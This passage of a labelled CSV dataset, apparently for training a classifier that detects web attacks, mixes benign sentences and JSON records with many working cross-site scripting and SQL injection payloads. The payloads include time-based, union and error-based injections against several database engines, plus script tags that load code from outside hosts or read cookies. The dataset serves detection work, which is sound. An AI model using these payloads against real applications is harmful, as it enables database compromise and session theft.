'src']</script><script>document.write(DOMPurify.sanitize('<img src onerror=alert(1)>'))</script>",1,XSS,492 "<div draggable=""true"" contenteditable>drag me</div><kbd ondragover=alert(1) contenteditable>drop here</kbd>",1,XSS,1183 "<style>:target {color:red;}</style><dd id=x style=""transition:color 1s"" ontransitionend=alert(1)></dd>",1,XSS,1377 "<li onbeforecopy=""alert(1)"" contenteditable>test</li>",1,XSS,5016 "select * from users where id = 1 *\. union select null,@@VERSION -- 1",2,SQLi,16258 1'+ ( select 'dkxk' where 1241 = 1241 waitfor delay '0:0:5'--,2,SQLi,17034 "<dialog oncut=""alert(1)"" contenteditable>test</dialog>",1,XSS,4760 "1' ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( 'qeet' = 'qeet",2,SQLi,10328 Sort alphabet blocks.,3,normal,22796 "<ul onkeyup=""alert(1)"" contenteditable>test</ul>",1,XSS,6042 "<colgroup draggable=""true"" ondragleave=""alert(1)"">test</colgroup>",1,XSS,2843 "<mark draggable=""true"" ondragenter=""alert(1)"">test</mark>",1,XSS,4182 1'|| ( select 'uiyj' from dual where 8320 = 8320,2,SQLi,18669 "<time draggable=""true"" ondragstart=""alert(1)"">test</time>",1,XSS,4088 Select your decision.,3,normal,24888 "<noembed onbeforepaste=""alert(1)"" contenteditable>test</noembed>",1,XSS,2889 "<body onclick=""alert(1)"">test</body>",1,XSS,8879 "1' ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( 'raus' = 'raus",2,SQLi,12295 "<strong onmouseenter=""alert(1)"">test</strong>",1,XSS,6674 "select * from users where id = 1 or 1#""1 union select version ( ) ,version ( ) -- 1",2,SQLi,15021 "<dl onmouseup=""alert(1)"">test</dl>",1,XSS,9214 1 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) -- fyaq,2,SQLi,17774 Select items.,3,normal,24493 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- rucf",2,SQLi,12605 1%' ) ) waitfor delay '0:0:5' and ( ( '%' = ',2,SQLi,19047 "{""id"":null,""name"":""Samurott""}",3,normal,26896 <shadow id=x tabindex=1 onfocus=alert(1)></shadow>,1,XSS,5604 I go to the wine shop and select a few bottles.,3,normal,26076 select ( case when ( 9931 = 3424 ) then 1 else 9931* ( select 9931 from master..sysdatabases ) end ) --,2,SQLi,13945 "<div oncopy=""alert(1)"" contenteditable>test</div>",1,XSS,5732 "1' ) as knxr where 5662 = 5662 union all select null,null,null,null,null,null,null,null#",2,SQLi,14769 "`""'><img src=xxx:x \x0Donerror=javascript:alert(1)>",1,XSS,5298 Filter the noise.,3,normal,22810 "1%' ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( '%' = '",2,SQLi,13003 1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5)),2,SQLi,19346 Select a book to read during the journey.,3,normal,24096 Where's the missing page?,3,normal,22689 if ( 8182 = 3225 ) select 8182 else drop function kpzk--,2,SQLi,17720 1'+ ( select 'ueak' where 7329 = 7329 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) ) +',2,SQLi,10195 "-4031"" ) ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""auhn"" = ""auhn",2,SQLi,10089 "1' or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'rhzy' = 'rhzy",2,SQLi,11562 "<meta onmouseenter=""alert(1)"">test</meta>",1,XSS,7672 <h1 id=x tabindex=1 onfocusin=alert(1)></h1>,1,XSS,6872 Where's your SQL book?,3,normal,23410 "1' in boolean mode ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13016 "1 where 3478 = 3478 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,10496 -1641' ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( 'vgcb' like 'vgcb,2,SQLi,9967 <img src/onerror=prompt(8)>,1,XSS,9646 "1"" ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14916 "1 ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( 9270 = 9270",2,SQLi,12685 "{""id"":null,""name"":""chemical""}",3,normal,27248 "<select onmouseleave=""alert(1)"">test</select>",1,XSS,6684 "<em draggable=""true"" ondragend=""alert(1)"">test</em>",1,XSS,5430 <svg><data onload=alert(1)></data>,1,XSS,9193 "<xss onmouseover=""alert(1)"" style=display:block>test</xss>",1,XSS,3788 "{""id"":null,""name"":""gain""}",3,normal,27366 "<style>@keyframes x{}</style><td style=""animation-name:x"" onanimationend=""alert(1)""></td>",1,XSS,1786 "<strong onmouseout=""alert(1)"">test</strong>",1,XSS,7119 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*",2,SQLi,16902 "<script oncut=""alert(1)"" contenteditable>test</script>",1,XSS,4685 -2679' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'cutk' like 'cutk,2,SQLi,10070 1' ) ) ) and sleep ( 5 ) #,2,SQLi,20967 <command id=x tabindex=1 ondeactivate=alert(1)></command><input id=y autofocus>,1,XSS,2040 "end and ( ( ( ""memh"" like ""memh",2,SQLi,20450 <input autofocus onfocus=alert(1)>,1,XSS,9284 select pg_sleep ( 5 ) and ( 'itgc' = 'itgc,2,SQLi,19305 hi' or 1 = 1 --,2,SQLi,22173 "1' in boolean mode ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12459 "S. purchases for advertising in select media (online, TV, radio)U.",3,normal,25741 <img src=validimage.png onload=alert(1)>,1,XSS,7879 "<output draggable=""true"" ondragleave=""alert(1)"">test</output>",1,XSS,3342 "1"" ) ) and 7533 = 7533 and ( ( ""gkca"" = ""gkca",2,SQLi,19061 Select your effect.,3,normal,24880 "<menuitem onmousemove=""alert(1)"">test</menuitem>",1,XSS,5913 Select your replace.,3,normal,25052 select sleep ( 5 ) -- waln,2,SQLi,20971 "<svg onmouseover=""alert(1)"">test</svg>",1,XSS,8517 <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>,1,XSS,2033 "-1525' ) ) ) union all select 4110,4110,4110,4110,4110,4110#",2,SQLi,17221 "<option onmouseout=""alert(1)"">test</option>",1,XSS,7238 "1'|| ( select 'lije' from dual where 5309 = 5309 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) ||'",2,SQLi,12779 "-7916' ) ) union all select 9299,9299,9299,9299,9299,9299,9299,9299,9299,9299#",2,SQLi,15351 "{""id"":null,""firstName"":""Ros"",""lastName"":""Probo"",""address"":""1023 Yishun Ind Pk A #01-09"",""city"":""452"",""telephone"":""2553078474""}",3,normal,26883 "1' ) ) as eleh where 1347 = 1347 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14007 "<div draggable=""true"" contenteditable>drag me</div><strong ondrop=alert(1) contenteditable>drop here</strong>",1,XSS,1081 "1%' and make_set ( 1227 = 5627,5627 ) and '%' = '",2,SQLi,18634 "select * from users where id = 1 or @#"", = 1 union select 1,version ( ) -- 1",2,SQLi,15475 Select the appropriate app for the task.,3,normal,24261 "-3234%"" ) ) or elt ( 1032 = 1032,3623 ) and ( ( ""%"" = """,2,SQLi,17750 Select a painting technique to try.,3,normal,24059 1' ) ) ) and 8162 = 1687 and ( ( ( 'tdyr' like 'tdyr,2,SQLi,18227 ") and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,19669 "<multicol oncontextmenu=""alert(1)"">test</multicol>",1,XSS,5651 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( ( 'wvzw' = 'wvzw",2,SQLi,15324 OR x=x#,2,SQLi,22526 select ( case when ( 4291 = 6937 ) then 4291 else 4291* ( select 4291 from mysql.db ) end ) #,2,SQLi,14530 <tt onblur=alert(1) tabindex=1 id=x></tt><input autofocus>,1,XSS,3864 "<basefont onbeforecut=""alert(1)"" contenteditable>test</basefont>",1,XSS,2938 "tYPE=""text/x-scriptlet"" DATA=""http://.rocks/scriptlet.html",1,XSS,3919 "><script+src=https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)""></script>",1,XSS,1691 "1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )",2,SQLi,14371 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><b id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></b>",1,XSS,307 "<frame draggable=""true"" ondragend=""alert(1)"">test</frame>",1,XSS,4058 1'+ ( select 'phtz' where 3171 = 3171,2,SQLi,19848 1 ) where 9078 = 9078 rlike sleep ( 5 ) #,2,SQLi,19407 Then they set off into the Ozarks to select trees.,3,normal,25348 ; alert(1);,1,XSS,9840 "-4148%"" ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( ""%"" = """,2,SQLi,17639 ><svg/onload=alert(/XSS/),1,XSS,9709 <font id=x tabindex=1 ondeactivate=alert(1)></font><input id=y autofocus>,1,XSS,2315 Select clear.,3,normal,24629 1 ) ) ) and 2006 = 2006,2,SQLi,21340 Merge the data sources.,3,normal,22720 "There is a small but very select collection of trees at Oxford, the oldest botanical garden in Great Britain, which was founded in 1632.",3,normal,25335 1 ) as iqkf where 7780 = 7780,2,SQLi,20732 <em onpointerdown=alert(1)>XSS</em>,1,XSS,9033 "><script+src=https://passport.ngs.ru/ajax/check?callback=alert(1337)""></script>",1,XSS,2064 "<caption onmousemove=""alert(1)"">test</caption>",1,XSS,6472 "1"" ) ) and elt ( 4249 = 4249,7259 ) and ( ( ""xjdh"" = ""xjdh",2,SQLi,17424 <caption onpointerenter=alert(1)>XSS</caption>,1,XSS,6479 "1"" ) ) as nejd where 2885 = 2885",2,SQLi,20307 "1"" or sleep ( 5 ) and ""telb"" = ""telb",2,SQLi,19975 <td id=x tabindex=1 onbeforeactivate=alert(1)></td>,1,XSS,5454 "1'+ ( select zfpk where 9784 = 9784 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) ) +'",2,SQLi,11303 Tap and select the speech you want read back to you.,3,normal,25509 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*",2,SQLi,9910 "<input onkeydown=""alert(1)"" contenteditable>test</input>",1,XSS,4272 <button onKeyDown=javascript:alert(1)>,1,XSS,8534 "This plan of creating an electoral college to select the president was expected to secure the choice by the best citizens of each state, in a tranquil and deliberate way, of the man whom they in their unfettered discretion should deem fittest to be the chief magistrate of the Union.",3,normal,25301 1 ) ) as hxzh where 9284 = 9284,2,SQLi,20495 "<i onmouseleave=""alert(1)"">test</i>",1,XSS,9098 Select prefer.,3,normal,24748 1' and 6621 = 4681--,2,SQLi,21868 -4389' ) ) ) or ( 1139 = 3499 ) *3499 and ( ( ( 'qoch' = 'qoch,2,SQLi,16996 "<script draggable=""true"" ondragenter=""alert(1)"">test</script>",1,XSS,3367 ",execute immediate 'sel' || 'ect us' || 'er'",2,SQLi,19078 "<;IMG SRC=""; &;#14; javascript:alert(';XSS';);"";>;",1,XSS,5517 "-6996%"" or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11805 "{""id"":null,""firstName"":""Zi"",""lastName"":""Jian"",""address"":""324 COMMERCE ROAD, FARMVILLE VA 23901"",""city"":""929"",""telephone"":""1631069164""}",3,normal,27551 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( ( 'ldqq' = 'ldqq",2,SQLi,15334 </title><</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>,1,XSS,2397 "1"" ) where 9499 = 9499",2,SQLi,21421 </plaintext\></|\><plaintext/onmouseover=prompt(1),1,XSS,5508 "-6419 union all select 7008,7008,7008,7008,7008--",2,SQLi,18578 "><script+src=https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)""></script>",1,XSS,926 "<span ondblclick=""alert(1)"">test</span>",1,XSS,8137 VICE: How did you select the photographers in the show?,3,normal,25191 "1 ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12094 -4607'|| ( select 'wkdg' where 7524 = 7524 order by 1--,2,SQLi,17761 "1"" ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ""rphs"" = ""rphs",2,SQLi,11730 <pre onpointerdown=alert(1)>XSS</pre>,1,XSS,8674 "perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out",1,XSS,3126 1' ) or sleep ( 5 ) and ( 'mdmr' like 'mdmr,2,SQLi,19182 <object onpointerup=alert(1)>XSS</object>,1,XSS,7623 ><s'%2b'cript>alert(document.cookie)</script>,1,XSS,6562 1 ) where 8041 = 8041,2,SQLi,21640 <button onStop=javascript:alert(1)>,1,XSS,9148 "1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and 'zlxw' = 'zlxw",2,SQLi,12744 alert(1)//,1,XSS,9849 I want to select a new workout routine.,3,normal,23887 "{""id"":null,""name"":""Porygon""}",3,normal,26764 <svg><p onload=alert(1)></p>,1,XSS,9630 "<u draggable=""true"" ondragend=""alert(1)"">test</u>",1,XSS,5800 <table id=x tabindex=1 onfocus=alert(1)></table>,1,XSS,5884 <body>Hello</body>,1,XSS,9785 "1%"" ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11372 "-2211"" or 2113 = 8885#",2,SQLi,21548 "1"" and 6969 = ( select 6969 from pg_sleep ( 5 ) )",2,SQLi,18589 I need to select the right book for my reading list.,3,normal,23712 "select * from users where id = 1 or ""?,"" or 1 = 1 -- 1",2,SQLi,17881 <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;,1,XSS,6105 <<scr\0ipt/src=http://xss.com/xss.js></script,1,XSS,6751 "1%' ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( '%' = '",2,SQLi,13033 <tt onpointerover=alert(1)>XSS</tt>,1,XSS,9085 1' ) where 9817 = 9817,2,SQLi,21429 "-6681"" ) or 5251 = 1162",2,SQLi,21325 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( 'cbaj' = 'cbaj,2,SQLi,15990 I'm considering where to have a family outing.,3,normal,23913 "<base oncut=""alert(1)"" contenteditable>test</base>",1,XSS,5542 "<style>@keyframes slidein {}</style><wbr style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></wbr>",1,XSS,423 "1"" union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,16105 -2207%' ) or ( 8459 = 8459 ) *4906 and ( '%' = ',2,SQLi,18714 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and 'gfpd' = 'gfpd",2,SQLi,16579 "<iframe onkeydown=""alert(1)"" contenteditable>test</iframe>",1,XSS,3958 "<menuitem oncontextmenu=""alert(1)"">test</menuitem>",1,XSS,5608 Select the best location.,3,normal,24480 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))",2,SQLi,11404 "<style>@keyframes x{}</style><map style=""animation-name:x"" onanimationend=""alert(1)""></map>",1,XSS,1727 "<style>:target {color: red;}</style><tt id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></tt>",1,XSS,1186 "-9096"" ) where 9452 = 9452 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,9998 "-2959"" union all select 3414,3414,3414,3414,3414,3414,3414,3414#",2,SQLi,16812 end and ( ( 2160 = 2160,2,SQLi,21362 "<div draggable=""true"" contenteditable>drag me</div><footer ondragover=alert(1) contenteditable>drop here</footer>",1,XSS,906 select pg_sleep ( 5 ) and ( ( '%' = ',2,SQLi,19902 <svg><source onload=alert(1)></source>,1,XSS,8349 "1' ) where 6731 = 6731 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17269 <button onMouseEnter=javascript:alert(1)>,1,XSS,7800 "<! foo=""><script>javascript:alert(1)</script>"">",1,XSS,6091 <button id=x tabindex=1 onbeforedeactivate=alert(1)></button><input autofocus>,1,XSS,2082 "<cite onmousemove=""alert(1)"">test</cite>",1,XSS,7931 "1"" ) ) as khqq where 3637 = 3637 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13877 I need to pick up my order from the store.,3,normal,23739 "<tfoot onmouseup=""alert(1)"">test</tfoot>",1,XSS,7936 "1"" ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ""cbck"" like ""cbck",2,SQLi,10870 "1"" ) as pkkx where 6716 = 6716 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --",2,SQLi,12201 <IMG SRC=jAVasCrIPt:alert(‘XSS’)>,1,XSS,9319 or,3,normal,23141 Where's the opera?,3,normal,23586 1'|| ( select 'yucg' where 2576 = 2576 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) ) ||',2,SQLi,9951 /?param=<javascript:alert(document.cookie>),1,XSS,7214 "<img src\x10=x onerror=""javascript:alert(1)"">",1,XSS,6536 <nextid id=x tabindex=1 onfocusin=alert(1)></nextid>,1,XSS,5211 <tbody onfocusout=alert(1) tabindex=1 id=x></tbody><input autofocus>,1,XSS,2648 -6203' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'luee' = 'luee,2,SQLi,10097 "-5160' ) as kgjw where 9609 = 9609 union all select 9609,9609--",2,SQLi,16849 "-1043"" ) where 4207 = 4207 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10646 Where's the WHERE clause?,3,normal,23468 "{""id"":null,""name"":""paint itself""}",3,normal,27593 "<div draggable=""true"" contenteditable>drag me</div><s ondrop=alert(1) contenteditable>drop here</s>",1,XSS,1480 "<style>:target {color: red;}</style><figcaption id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></figcaption>",1,XSS,694 table,3,normal,23116 <menuitem onpointerout=alert(1)>XSS</menuitem>,1,XSS,6367 "{""id"":null,""name"":""far""}",3,normal,27012 1 ) where 8232 = 8232 and ( 3020 = 3020 ) *6703--,2,SQLi,18563 "<hgroup onmouseup=""alert(1)"">test</hgroup>",1,XSS,7373 "<style>:target {color:red;}</style><nav id=x style=""transition:color 1s"" ontransitionend=alert(1)></nav>",1,XSS,1303 <area onpointerenter=alert(1)>XSS</area>,1,XSS,7840 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12",2,SQLi,14901 "<tbody draggable=""true"" ondragstart=""alert(1)"">test</tbody>",1,XSS,3717 Where's the tattoo parlor?,3,normal,23620 <input type=image src=validimage.png onload=alert(1)>,1,XSS,5039 <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>,1,XSS,4401 1'+ ( select iutk where 6158 = 6158,2,SQLi,20030 "-4876"" ) ) as saug where 2256 = 2256 union all select 2256,2256,2256,2256,2256,2256,2256,2256,2256,2256--",2,SQLi,13864 -1280' ) ) or 8571 = 8571--,2,SQLi,20929 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i",2,SQLi,11318 "<cite oncontextmenu=""alert(1)"">test</cite>",1,XSS,7357 "select * from users where id = 1 *$ . union select null,@@VERSION -- 1",2,SQLi,16146 <button onScroll=javascript:alert(1)>,1,XSS,8753 "The governing body consisted of 180 members, chosen from certain influential families, and the executive was entrusted to a select committee of artynae (from apTUVEav, to manage).",3,normal,25442 "<style>:target {color:red;}</style><u id=x style=""transition:color 1s"" ontransitionend=alert(1)></u>",1,XSS,1438 "javascript:`/*\""/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover=""/**/ alert()//'"">`",1,XSS,509 "select * from users where id = '1'<@$$ union select 1,version ( ) -- 1'",2,SQLi,16041 "<rt onkeypress=""alert(1)"" contenteditable>test</rt>",1,XSS,5404 "<th onkeyup=""alert(1)"" contenteditable>test</th>",1,XSS,5932 "He edited the Works of William Warburton, the Select Works (1772) of Abraham Cowley, and left materials for an edition (6 vols., 1811) of Addison.",3,normal,26127 <dl onpointerleave=alert(1)>XSS</dl>,1,XSS,8950 "{""id"":null,""firstName"":""Leanne"",""lastName"":""Eran"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27318 1'|| ( select 'xugb' from dual where 6772 = 6772,2,SQLi,18747 "1' ) as dajk where 1452 = 1452 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12266 1' ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 'qfxg' = 'qfxg,2,SQLi,17327 "<script draggable=""true"" ondrag=""alert(1)"">test</script>",1,XSS,4388 "1 ) ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( 8814 = 8814",2,SQLi,12768 "1"" ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( ""prtf"" like ""prtf",2,SQLi,10334 "-8600"" or elt ( 1032 = 1032,3623 ) and ""kfsn"" like ""kfsn",2,SQLi,17691 Let's decide where to go for our next outing.,3,normal,23864 <nobr onpointerup=alert(1)>XSS</nobr>,1,XSS,8696 1%' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and '%' = ',2,SQLi,17051 "<style>@keyframes x{}</style><hgroup style=""animation-name:x"" onanimationend=""alert(1)""></hgroup>",1,XSS,1541 "<rt ondblclick=""alert(1)"">test</rt>",1,XSS,9124 "<style>:target {color:red;}</style><area id=x style=""transition:color 1s"" ontransitionend=alert(1)></area>",1,XSS,1213 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--",2,SQLi,15308 Where's the bed and breakfast?,3,normal,23555 <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x,1,XSS,2562 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#",2,SQLi,13131 "1'|| ( select 'hwyv' from dual where 1155 = 1155 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) ) ||'",2,SQLi,13053 "1' ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( 'rxxb' = 'rxxb",2,SQLi,11593 1' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'uqfs' = 'uqfs,2,SQLi,12692 "<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>",1,XSS,392 "select * from users where id = 1 or ""]1"" or 1 = 1 -- 1",2,SQLi,17872 "select * from users where id = 1 or "" ( 1"" or 1 = 1 -- 1",2,SQLi,17600 "1', ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4250 = 4250 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual )",2,SQLi,10088 <xss class=progress-bar-animated onanimationstart=alert(1)>,1,XSS,3592 "1"" ) as assu where 7521 = 7521 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11374 "<dir onmouseover=""alert(1)"">test</dir>",1,XSS,8438 <details onpointermove=alert(1)>XSS</details>,1,XSS,6722 1' in boolean mode ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) #,2,SQLi,15564 1 ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,16914 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5#",2,SQLi,14717 "<style>:target {color:red;}</style><section id=x style=""transition:color 1s"" ontransitionend=alert(1)></section>",1,XSS,948 "1"" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ""vnei"" like ""vnei",2,SQLi,15600 "( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,14351 "The hard-boiled and peeled eggs were sold in pails under various names, including Rainbow Select Hard-cooked 